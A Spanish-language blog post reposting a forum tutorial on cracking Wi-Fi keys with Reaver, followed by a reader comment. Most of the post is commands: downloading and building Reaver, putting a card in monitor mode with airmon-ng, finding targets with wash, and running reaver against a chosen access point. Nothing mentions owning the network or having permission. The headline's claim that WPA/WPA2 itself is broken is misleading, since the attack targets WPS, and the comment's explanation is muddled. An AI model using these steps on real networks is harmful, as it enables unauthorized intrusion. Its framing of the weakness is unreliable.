Wi-Fi – WPA/WPA2 son vulnerables

anonymous___we_are_legion_by_muusedesign-d4mnrq0Hoy comparto con ustedes un manual que compartio ANTRAX en underc0de.org, donde podemos ver que ya las WPA/WPA2 son vulnerables.Descargamos Reaver desde la consola.

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Luego lo descomprimimos:

tar -xvf reaver-1.4.tar.gz
Entramos en la carpeta cd reaver-1.4/src
Despues lo instalamos con

  1. ./configure
  2. make
  3. make install

Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor

  1. airmon-ng start wlan0

*Para buscar las redes vulnerables escribimos

  1. wash -i mon0

*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal. Luego ejecutamos reaverEjemplo: Uso:

  1. reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas

Fuente: Foro en underc0de.org

6 Replies to “Wi-Fi – WPA/WPA2 son vulnerables”

  1. Esto no es noticia… todo los protocolos de encriptación de tipo reversibles son vulnerables a ataques de este tipo, incluso hay herrramientas que se tardan menos tiempo, pero siempre es bueno conocer una más

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*